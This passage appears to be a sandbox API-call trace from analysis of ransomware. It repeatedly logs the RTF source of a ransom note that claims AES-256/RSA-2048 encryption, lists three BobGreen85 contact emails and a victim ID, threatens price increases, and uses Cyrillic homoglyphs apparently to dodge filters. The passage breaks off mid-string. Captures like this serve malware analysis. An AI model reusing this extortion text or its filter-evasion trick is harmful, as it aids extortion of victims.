h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2863a28, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u 